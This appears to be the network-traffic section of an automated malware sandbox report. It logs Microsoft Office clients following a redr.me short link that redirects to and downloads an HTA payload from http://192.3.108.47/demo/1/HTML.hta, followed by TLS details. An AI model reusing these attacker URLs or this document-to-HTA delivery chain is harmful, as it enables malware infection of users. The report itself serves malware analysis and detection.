Network Analysis
Name | Response | Post-Analysis Lookup
---|---|---
redr.me | 104.21.30.250 |

OPTIONS https://redr.me/ -> 200
OPTIONS / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft Office Word 2013
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: redr.me
HTTP/1.1 200 OK
Date: Mon, 02 Oct 2023 05:25:10 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
allow: GET, HEAD, OPTIONS
x-frame-options: DENY
vary: Origin
x-content-type-options: nosniff
referrer-policy: same-origin
strict-transport-security: max-age=15724800; includeSubDomains
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wu8lrOL4F0CJ%2FV3m42xuUb9sWMN0sWZWDbZOehhfgNVryriIhf902Z2tkA1T42WWeI%2F7w0o0hc3gtdjA4Lc4Npy0cDXllSfB1ZX%2Brg85uwHw5W6uQIfov5aP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80fa85f26f218361-KIX
alt-svc: h3=":443"; ma=86400

HEAD https://redr.me/llj4ev -> 302
HEAD /llj4ev HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft Office Word 2013
X-IDCRL_ACCEPTED: t
Host: redr.me
HTTP/1.1 302 Found
Date: Mon, 02 Oct 2023 05:25:11 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
location: http://192.3.108.47/demo/1/HTML.hta
x-frame-options: DENY
vary: Origin
x-content-type-options: nosniff
referrer-policy: same-origin
strict-transport-security: max-age=15724800; includeSubDomains
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KSi2P%2BLaPijvnzJdr8egwe%2BVmeKJvLWjztZDDU%2FuyFcSoLilO%2F0foZJqPIIGQ6cELtyxPVRNlycjt1Z5CZHEQHREH4nNHZxrEKq85drT4cY9gttaX%2FR7xW77"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80fa85f66f508361-KIX
alt-svc: h3=":443"; ma=86400

OPTIONS https://redr.me/ -> 200
OPTIONS / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft Office Word 2013
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: redr.me
HTTP/1.1 200 OK
Date: Mon, 02 Oct 2023 05:25:14 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
allow: GET, HEAD, OPTIONS
x-frame-options: DENY
vary: Origin
x-content-type-options: nosniff
referrer-policy: same-origin
strict-transport-security: max-age=15724800; includeSubDomains
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8I5NeAAccZhOQXjMOQHUQCtTaEGgSEYp8O9CCpjvbj9cls2ktNXpobqMJOxShA8NLuGU0TvB%2FgGVKhoeD4lppRvD5DYonjz1nVa2YaPccuwETbmYp%2FAeymj1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80fa860af8ea8361-KIX
alt-svc: h3=":443"; ma=86400

GET https://redr.me/llj4ev -> 302
GET /llj4ev HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; ms-office; MSOffice 15)
Accept-Encoding: gzip, deflate
Host: redr.me
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Mon, 02 Oct 2023 05:25:15 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
location: http://192.3.108.47/demo/1/HTML.hta
x-frame-options: DENY
vary: Origin
x-content-type-options: nosniff
referrer-policy: same-origin
strict-transport-security: max-age=15724800; includeSubDomains
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ObJ6sQvPS3Ba0BhZNQ36dPTzenEHGIZF8JQCex1I3thBHKWmK3fRK%2BVHB0MPgtwE8W92Z%2BtcT6%2BHOo9G%2BfaTJc%2FpvjBDKurzld62Rd4ZwvD%2Fsxi6I7B86U1N"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80fa860dafa88d07-KIX
alt-svc: h3=":443"; ma=86400

HEAD https://redr.me/llj4ev -> 302
HEAD /llj4ev HTTP/1.1
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: redr.me
Content-Length: 0
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Mon, 02 Oct 2023 05:25:16 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
location: http://192.3.108.47/demo/1/HTML.hta
x-frame-options: DENY
vary: Origin
x-content-type-options: nosniff
referrer-policy: same-origin
strict-transport-security: max-age=15724800; includeSubDomains
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BakhJ103yjZ9kxaFz9EaSvsxNzcJ1iTIcd%2FPwOvBCnyNSlnXK3jWqEzMeBRpYwkpBFzIANukvr96aX0n2TeHuCKqD%2BdvIZsAxV7xp7BMaLm7uTHwtZgBvS8M"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80fa8617ba7a8d07-KIX
alt-svc: h3=":443"; ma=86400

OPTIONS https://redr.me/ -> 200
OPTIONS / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft Office Word 2013
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: redr.me
HTTP/1.1 200 OK
Date: Mon, 02 Oct 2023 05:25:16 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
allow: GET, HEAD, OPTIONS
x-frame-options: DENY
vary: Origin
x-content-type-options: nosniff
referrer-policy: same-origin
strict-transport-security: max-age=15724800; includeSubDomains
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q4mGGSrFWSk90ulJ4aftYXFewtEVs6KDu3Qr%2Bt2yltgEKdmi7sgZ8d%2BL2nsZCxO2Jefb%2BtKWkwU8EZvbpUAbtKocjE3X19%2B0VILgzXkZDJYBNEDHnUmLDUJz"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80fa861a7c608361-KIX
alt-svc: h3=":443"; ma=86400

HEAD https://redr.me/llj4ev -> 302
HEAD /llj4ev HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft Office Word 2013
X-IDCRL_ACCEPTED: t
Host: redr.me
HTTP/1.1 302 Found
Date: Mon, 02 Oct 2023 05:25:17 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
location: http://192.3.108.47/demo/1/HTML.hta
x-frame-options: DENY
vary: Origin
x-content-type-options: nosniff
referrer-policy: same-origin
strict-transport-security: max-age=15724800; includeSubDomains
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LpaSrL9rVFpq%2BAXunRbeEMUydrmPnbhDmwiPzxFNw6RhywCD8LsDNnQgMPQydub97rRYBXngkunUslHYxsDb0CD3Rc7k4m92Z9bozIO4AU53iixUksCgjqGl"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80fa861c1fb38361-KIX
alt-svc: h3=":443"; ma=86400

GET https://redr.me/llj4ev -> 302
GET /llj4ev HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; ms-office; MSOffice 15)
Accept-Encoding: gzip, deflate
Host: redr.me
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Mon, 02 Oct 2023 05:25:17 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
location: http://192.3.108.47/demo/1/HTML.hta
x-frame-options: DENY
vary: Origin
x-content-type-options: nosniff
referrer-policy: same-origin
strict-transport-security: max-age=15724800; includeSubDomains
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VTWJnkg%2FHQZ08WI%2Fh24MZlAYGVFnepzAtnJWyPNP8%2Bwsa7pBXonmOLKZZm5YT1g%2BhrJz5%2B1edt1C4mz5ixLoNwQPR%2BXNI09sAil1YrSV1D9%2Fft07oDG01rsE"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80fa861dce318d07-KIX
alt-svc: h3=":443"; ma=86400

HEAD https://redr.me/llj4ev -> 302
HEAD /llj4ev HTTP/1.1
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Host: redr.me
Content-Length: 0
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Mon, 02 Oct 2023 05:25:17 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
location: http://192.3.108.47/demo/1/HTML.hta
x-frame-options: DENY
vary: Origin
x-content-type-options: nosniff
referrer-policy: same-origin
strict-transport-security: max-age=15724800; includeSubDomains
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4ipXrPWuOtmvmpYzkc5yBgPJgqaV%2BNXC9jAU8qEuNiLmJIXkQfYsnwqpaRlCwjISFqVVLbBHs8yordJ8DSGN9Qlqe9P%2BtMNnWVmMbfYsFy30StTKq7LlsxOq"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80fa86209bbb8d07-KIX
alt-svc: h3=":443"; ma=86400

GET https://redr.me/llj4ev -> 302
GET /llj4ev HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Host: redr.me
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Mon, 02 Oct 2023 05:25:18 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
location: http://192.3.108.47/demo/1/HTML.hta
x-frame-options: DENY
vary: Origin
x-content-type-options: nosniff
referrer-policy: same-origin
strict-transport-security: max-age=15724800; includeSubDomains
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JQDyeDc8IceYU8KawQjb9IHHl1G2D4r0RkFAjwaTRPcuH7awTCh%2B0%2F11SM7RIOcCnBdZv4%2BlrAZjo2K1qktzwY2omlvtRo1AheyN7JR7HvTIuIQFRFtwUN0m"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 80fa862369d58d07-KIX
alt-svc: h3=":443"; ma=86400

GET http://192.3.108.47/demo/1/HTML.hta -> 200
GET /demo/1/HTML.hta HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; ms-office; MSOffice 15)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: 192.3.108.47
HTTP/1.1 200 OK
Date: Mon, 02 Oct 2023 05:25:15 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
Last-Modified: Mon, 25 Sep 2023 14:30:10 GMT
ETag: "29240-6062fcba50cd3"
Accept-Ranges: bytes
Content-Length: 168512
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/hta

HEAD http://192.3.108.47/demo/1/HTML.hta -> 200
HEAD /demo/1/HTML.hta HTTP/1.1
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Content-Length: 0
Connection: Keep-Alive
Host: 192.3.108.47
HTTP/1.1 200 OK
Date: Mon, 02 Oct 2023 05:25:16 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
Last-Modified: Mon, 25 Sep 2023 14:30:10 GMT
ETag: "29240-6062fcba50cd3"
Accept-Ranges: bytes
Content-Length: 168512
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/hta

GET http://192.3.108.47/demo/1/HTML.hta -> 304
GET /demo/1/HTML.hta HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; ms-office; MSOffice 15)
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 25 Sep 2023 14:30:10 GMT
Connection: Keep-Alive
Host: 192.3.108.47
If-None-Match: "29240-6062fcba50cd3"
HTTP/1.1 304 Not Modified
Date: Mon, 02 Oct 2023 05:25:17 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
Last-Modified: Mon, 25 Sep 2023 14:30:10 GMT
ETag: "29240-6062fcba50cd3"
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

HEAD http://192.3.108.47/demo/1/HTML.hta -> 200
HEAD /demo/1/HTML.hta HTTP/1.1
X-IDCRL_ACCEPTED: t
User-Agent: Microsoft Office Existence Discovery
Content-Length: 0
Connection: Keep-Alive
Host: 192.3.108.47
HTTP/1.1 200 OK
Date: Mon, 02 Oct 2023 05:25:17 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
Last-Modified: Mon, 25 Sep 2023 14:30:10 GMT
ETag: "29240-6062fcba50cd3"
Accept-Ranges: bytes
Content-Length: 168512
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: application/hta

GET http://192.3.108.47/demo/1/HTML.hta -> 304
GET /demo/1/HTML.hta HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
If-Modified-Since: Mon, 25 Sep 2023 14:30:10 GMT
Connection: Keep-Alive
Host: 192.3.108.47
If-None-Match: "29240-6062fcba50cd3"
HTTP/1.1 304 Not Modified
Date: Mon, 02 Oct 2023 05:25:18 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
Last-Modified: Mon, 25 Sep 2023 14:30:10 GMT
ETag: "29240-6062fcba50cd3"
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint
---|---|---|---
TLSv1 192.168.56.103:49165 172.67.174.59:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=redr.me | 79:b5:6c:ad:de:52:0d:3f:6a:18:7f:62:1e:2b:4b:34:0d:ec:65:50
TLSv1 192.168.56.103:49163 172.67.174.59:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=redr.me | 79:b5:6c:ad:de:52:0d:3f:6a:18:7f:62:1e:2b:4b:34:0d:ec:65:50
Snort Alerts
No Snort Alerts